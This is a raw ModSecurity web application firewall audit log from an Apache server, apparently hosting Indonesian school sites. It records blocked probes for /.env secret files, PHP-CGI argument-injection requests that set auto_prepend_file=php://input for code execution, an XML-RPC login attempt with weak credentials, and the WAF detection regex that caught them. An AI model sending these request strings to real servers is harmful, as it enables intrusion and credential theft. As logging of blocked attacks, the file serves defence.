HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6a09470f-E--
--6a09470f-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744722123171335 5051 (- - -)
Stopwatch2: 1744722123171335 5051; combined=3128, p1=508, p2=2587, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6a09470f-Z--
--b1fbe65f-A--
[15/Apr/2025:20:22:04 +0700] Z_5dfKXLWI2MDahumW9-wwAAAMo 103.236.140.4 42282 103.236.140.4 8181
--b1fbe65f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14
Accept-Charset: utf-8
--b1fbe65f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b1fbe65f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744723324751544 805 (- - -)
Stopwatch2: 1744723324751544 805; combined=333, p1=292, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b1fbe65f-Z--
--6112cd37-A--
[15/Apr/2025:22:44:18 +0700] Z_5-0iULYKh39tLgM0CTNAAAAEs 103.236.140.4 43408 103.236.140.4 8181
--6112cd37-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 78.153.140.151
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 78.153.140.151
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; ko-kr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
--6112cd37-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6112cd37-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744731858950945 886 (- - -)
Stopwatch2: 1744731858950945 886; combined=371, p1=328, p2=0, p3=0, p4=0, p5=43, sr=84, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6112cd37-Z--
--525e0623-A--
[15/Apr/2025:22:58:00 +0700] Z_6CCKXLWI2MDahumW9_JgAAANU 103.236.140.4 43566 103.236.140.4 8181
--525e0623-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 37.114.63.53
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 37.114.63.53
X-Forwarded-Proto: http
Connection: close
User-Agent: python-requests/2.32.3
Accept: */*
--525e0623-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--525e0623-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744732680393718 956 (- - -)
Stopwatch2: 1744732680393718 956; combined=378, p1=338, p2=0, p3=0, p4=0, p5=40, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--525e0623-Z--
--3874f16c-A--
[15/Apr/2025:23:03:27 +0700] Z_6DTyULYKh39tLgM0CTXgAAAEM 103.236.140.4 43600 103.236.140.4 8181
--3874f16c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; ELE-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--3874f16c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3874f16c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744733007058296 822 (- - -)
Stopwatch2: 1744733007058296 822; combined=325, p1=284, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3874f16c-Z--
--b6d6fe77-A--
[15/Apr/2025:23:36:12 +0700] Z_6K_KXLWI2MDahumW9_OQAAAMM 103.236.140.4 43804 103.236.140.4 8181
--b6d6fe77-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--b6d6fe77-C--
--b6d6fe77-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b6d6fe77-E--
--b6d6fe77-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744734972504349 4751 (- - -)
Stopwatch2: 1744734972504349 4751; combined=2940, p1=544, p2=2366, p3=0, p4=0, p5=30, sr=132, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b6d6fe77-Z--
--0e61b20e-A--
[15/Apr/2025:23:56:54 +0700] Z_6P1iULYKh39tLgM0CTdwAAAFY 103.236.140.4 43860 103.236.140.4 8181
--0e61b20e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.190
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.190
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--0e61b20e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0e61b20e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744736214825167 825 (- - -)
Stopwatch2: 1744736214825167 825; combined=358, p1=317, p2=0, p3=0, p4=0, p5=40, sr=80, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0e61b20e-Z--
--388d5a42-A--
[15/Apr/2025:23:56:58 +0700] Z_6P2qXLWI2MDahumW9_PwAAANM 103.236.140.4 43864 103.236.140.4 8181
--388d5a42-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.190
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.190
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--388d5a42-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--388d5a42-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744736218865069 839 (- - -)
Stopwatch2: 1744736218865069 839; combined=362, p1=320, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--388d5a42-Z--
--b491fb6c-A--
[16/Apr/2025:00:22:58 +0700] Z_6V8s-f7AifS1fst96C-gAAAAQ 103.236.140.4 44096 103.236.140.4 8181
--b491fb6c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.211.191.76
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.211.191.76
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.3; ko-kr; SHW-M250S Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Accept-Charset: utf-8
--b491fb6c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b491fb6c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744737778806102 896 (- - -)
Stopwatch2: 1744737778806102 896; combined=403, p1=362, p2=0, p3=0, p4=0, p5=40, sr=126, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b491fb6c-Z--
--8c59c10b-A--
[16/Apr/2025:00:27:51 +0700] Z_6XF8-f7AifS1fst96C-wAAABc 103.236.140.4 44098 103.236.140.4 8181
--8c59c10b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.70.87
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.70.87
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116
Accept-Charset: utf-8
--8c59c10b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8c59c10b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744738071691929 844 (- - -)
Stopwatch2: 1744738071691929 844; combined=352, p1=311, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8c59c10b-Z--
--92fded76-A--
[16/Apr/2025:01:01:06 +0700] Z_6e4s-f7AifS1fst96DQgAAAA4 103.236.140.4 45112 103.236.140.4 8181
--92fded76-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 143.198.4.146
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 143.198.4.146
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--92fded76-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--92fded76-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744740066547828 875 (- - -)
Stopwatch2: 1744740066547828 875; combined=375, p1=336, p2=0, p3=0, p4=0, p5=39, sr=122, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--92fded76-Z--
--c5bdf07a-A--
[16/Apr/2025:01:51:35 +0700] Z_6qt81f8LoF-Pq3UL4VpQAAAJY 103.236.140.4 45276 103.236.140.4 8181
--c5bdf07a-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 116.198.231.35
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 116.198.231.35
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--c5bdf07a-C--
--c5bdf07a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c5bdf07a-E--
--c5bdf07a-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744743095209599 4678 (- - -)
Stopwatch2: 1744743095209599 4678; combined=3085, p1=473, p2=2581, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c5bdf07a-Z--
--40240255-A--
[16/Apr/2025:07:30:47 +0700] Z_76Nxk9XPLR9cFiTEu7FwAAABc 103.236.140.4 49278 103.236.140.4 8181
--40240255-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.135.193.65
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.135.193.65
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3
Accept-Charset: utf-8
--40240255-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--40240255-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744763447866956 877 (- - -)
Stopwatch2: 1744763447866956 877; combined=368, p1=326, p2=0, p3=0, p4=0, p5=42, sr=104, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--40240255-Z--
--c445d810-A--
[16/Apr/2025:07:50:18 +0700] Z_7-yk-sESiKFppgz04V4AAAAMg 103.236.140.4 49430 103.236.140.4 8181
--c445d810-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.151.123.101
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.151.123.101
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--c445d810-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c445d810-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744764618904517 696 (- - -)
Stopwatch2: 1744764618904517 696; combined=266, p1=231, p2=0, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c445d810-Z--
--56d2e44a-A--
[16/Apr/2025:07:50:35 +0700] Z_7-2ype92T0H9-Aa0y15gAAAEU 103.236.140.4 49434 103.236.140.4 8181
--56d2e44a-B--
GET /sendgrid/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.151.123.101
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.151.123.101
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--56d2e44a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--56d2e44a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744764635564321 12750 (- - -)
Stopwatch2: 1744764635564321 12750; combined=24155, p1=271, p2=0, p3=0, p4=0, p5=11961, sr=74, sw=0, l=0, gc=11923
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--56d2e44a-Z--
--a84a3d3e-A--
[16/Apr/2025:09:13:45 +0700] Z_8SWSpe92T0H9-Aa0y2AwAAAE4 103.236.140.4 50510 103.236.140.4 8181
--a84a3d3e-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.141.38
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.141.38
X-Forwarded-Proto: http
Connection: close
Content-Length: 110
User-Agent: python-requests/2.25.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
--a84a3d3e-C--
--a84a3d3e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a84a3d3e-E--
--a84a3d3e-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744769625528436 5043 (- - -)
Stopwatch2: 1744769625528436 5043; combined=3020, p1=534, p2=2453, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a84a3d3e-Z--
--3461d16f-A--
[16/Apr/2025:09:38:22 +0700] Z_8YHipe92T0H9-Aa0y2DgAAAEg 103.236.140.4 50710 103.236.140.4 8181
--3461d16f-B--
GET /.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 194.163.182.227
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
Accept: */*
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Cookie:
X-Forwarded-For: 194.163.182.227
Accept-Encoding: gzip
X-Varnish: 126626352
--3461d16f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--3461d16f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744771102246237 911 (- - -)
Stopwatch2: 1744771102246237 911; combined=347, p1=305, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3461d16f-Z--
--54128e26-A--
[16/Apr/2025:11:00:55 +0700] Z_8rdype92T0H9-Aa0y2VgAAAFU 103.236.140.4 51384 103.236.140.4 8181
--54128e26-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--54128e26-C--
wp.getUsersBlogs
admin
123456789
--54128e26-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--54128e26-E--
--54128e26-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776055268505 4500 (- - -)
